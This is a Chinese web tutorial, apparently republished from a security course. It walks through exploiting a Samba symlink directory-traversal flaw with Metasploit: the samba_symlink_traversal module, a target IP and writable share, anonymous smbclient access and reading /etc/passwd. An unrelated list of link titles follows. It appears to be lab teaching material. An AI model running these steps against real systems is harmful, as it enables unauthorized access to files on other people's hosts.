Metasploit溢出samba提权漏洞
发表于:2025-01-20 作者:千家信息网编辑
千家信息网最后更新 2025年01月20日,Samba是一套实现SMB(server messages block)协议,跨平台进行文件共享和打印共享服务的程序,samba的sambd默认配置在可写文件共享时,存在目录遍历漏洞,远程用户可以通过
千家信息网最后更新 2025年01月20日Metasploit溢出samba提权漏洞
Samba是一套实现SMB(server messages block)协议,跨平台进行文件共享和打印共享服务的程序,samba的sambd默认配置在可写文件共享时,存在目录遍历漏洞,远程用户可以通过smbclient端使用一个对称命,创建一个包含..的目录遍历符的软连接 ,可以进行目录遍历以及访问任意文件。
一、利用nmap工具扫描目标主机
1.1使用nmap命令对目标主机进行扫描。单击桌面空白处,右键菜单选择"在终端中打开"。
1.3在终端中输入命令"msfconsole",启动MSF终端。
1.4在终端中输入命令"search samba",搜索samba的相关工具和***载荷。
1.5在终端中输入命令"use auxiliary/admin/smb/samba_symlink_traversal",启用漏洞利用模块, 提示符就会提示进入到该路径下。
1.6在终端中输入命令"info",查看需要设置的相关项,"yes"表示必须填写的参数。
1.7在终端中输入命令"set RHOST 192.168.1.3",设置目标主机的IP地址。
1.8在终端中输入"set SMBSHARE tmp", 设置SAM可写文件。
1.9在终端中输入"exploit", 开始***。
1.10新打开一个终端,输入"smbclient //192.168.1.3/tmp",直接回车,不用输入密码。
1.11在终端中输入"cd rootfs", 进入rootfs目录,在终端下输入命令"ls",列出目录。
1.12在终端中输入"more /etc/passwd", 查看目标主机系统中的密码。
终端
输入
命令
目录
主机
文件
目标
漏洞
密码
工具
提示
对称
不用
参数
可以通过
地址
提示符
桌面
模块
用户
数据库的安全要保护哪些东西
数据库安全各自的含义是什么
生产安全数据库录入
数据库的安全性及管理
数据库安全策略包含哪些
海淀数据库安全审计系统
建立农村房屋安全信息数据库
易用的数据库客户端支持安全管理
连接数据库失败ssl安全错误
数据库的锁怎样保障安全
开展网络安全应急处置演练
一中网络安全应急演练
安卓与服务器http通信
数据库的收录范围指什么
ptp在哪个服务器
热血传奇38区是哪里的服务器
javascript连接数据库
组态王服务器与客户端工程配置
网易我的世界忍者服务器
刀剑乱舞服务器满员
创益网络技术有限公司
中国文化对软件开发的应用
海康4200登录服务器失败
波兰关于网络安全的立场
税务局网络安全周宣传信息
现在干网络安全赚钱吗
杨浦区信息软件开发服务报价表
方舟端游服务器连接失败怎么回事
量子天际网络技术有限公司
网络安全训练
开展网络安全应急处置演练
配方软件开发案例
游戏挣钱软件开发
服务器jdk8 tsl
数据库读数据时如何确定是最新的
网易号网络安全
ifix数据库值修改当前值
广东网络安全相关培训线上学习
ci配置2个数据库
讲述身边的网络安全故事